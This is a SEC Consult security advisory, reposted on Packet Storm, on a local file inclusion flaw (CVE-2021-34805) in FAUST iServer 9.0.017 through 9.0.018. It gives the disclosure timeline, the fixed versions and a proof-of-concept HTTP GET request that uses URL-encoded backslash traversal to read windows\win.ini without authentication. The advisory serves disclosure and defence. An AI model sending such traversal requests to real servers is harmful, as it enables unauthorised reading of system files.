exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FAUST iServer 9.0.018.018.4 Local File Inclusion

FAUST iServer 9.0.018.018.4 Local File Inclusion
Posted Jan 25, 2022
Authored by Mario Keck | Site sec-consult.com

Land Software's FAUST iServer versions 9.0.017.017.1-3 through 9.0.018.018.4 suffer from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
advisories | CVE-2021-34805
SHA-256 | 1940c0374c57a3ce5c29fb1b1586c473fe48cd03993e507d365564b0b210c462

FAUST iServer 9.0.018.018.4 Local File Inclusion

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20220120-0 >
=======================================================================
title: Local file inclusion vulnerability
product: Land Software - FAUST iServer
vulnerable version: 9.0.017.017.1-3 - 9.0.018.018.4
fixed version: 9.0.019.019.7, Version 10
CVE number: CVE-2021-34805
impact: high
homepage: https://www.land-software.de
found: 2021-05-25
by: Mario Keck (Atos Germany)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
(German) "Der FAUST iServer bringt Ihre FAUST- , FAUST Entry- und LIDOS-Datenbanken
ins Intranet und Internet. Er bietet hohe Sicherheit und eine einfache
Installation."

Source: http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver


Business recommendation:
------------------------
The vendor provides a hotfix for the identified vulnerable versions. As the
most actual version v10 of FAUST iServer is not vulnerable, no immediate action in
the form of a patch is required. The webroot of the server should not be on the
same partition as the operating system's root partition.


Vulnerability overview/description:
-----------------------------------
1) Local File Inclusion (CVE-2021-34805)
When a URL is requested, the FAUST iServer checks for the corresponding ".fau"
file on the operating system. ".fau" files can be compared with compiled
webserver pages for displaying the content of the webpage. The identified
vulnerable versions of FAUST iServer do not properly protect against a request
aiming to read local files of the operating system.

FAUST iServer is designed to work on Windows operating systems only.
Therefore, by simply URL-encoding a path like
..\..\..\windows\win.ini into %2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
the FAUST iServer returns the contents of win.ini


Proof of concept:
-----------------
1) Local File Inclusion (CVE-2021-34805)
The following proof of concept shows the HTTP request that was used to read
local files of the server's operating system.
The vulnerability, as shown in the proof of concept request below, can be
triggered as soon as a vulnerable version of FAUST iServer is in use. To read
operating system specific files, the webroot of FAUST iServer has to be located
on the same partition as the operating system root.
Authorization is not needed.

-------------------------------------------------------------------------------
HTTP Request:
GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Connection: keep-alive
Host: <IP>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
-------------------------------------------------------------------------------

Vulnerable / tested versions:
-----------------------------
The following versions have been tested and found to be vulnerable:
* 9.0.017.017.1-3
* 9.0.018.018.4


Vendor contact timeline:
------------------------
2021-06-10: Contacting vendor via email.
2021-06-14: Vendor requested more information about the vulnerability, which
was provided on the same day.
2021-06-15: Requested information from vendor to check which versions are
vulnerable.
2021-06-17: Vendor informed researcher about upcoming update and promised to
inform all customers about the critical security fix in it.
2021-08-09: Confirmed the security fix in FAUST iServer 9.0.019.019.7.
2021-08-16: Researcher received a notification mail from the vendor's
newsletter announcing the official release of the fixed version.
2022-01-12: Version 10 was officially released and is available for all
customers for upgrade.
2022-01-20: Release of security advisory


Solution:
---------
The vulnerability is fixed in the following version:
* 9.0.019.019.7

This patch should be immediately installed.

Version 10 is not affected by this vulnerability, if possible it is recommended
to upgrade to this version.


Workaround:
-----------
None


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Mario Keck / @2022


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close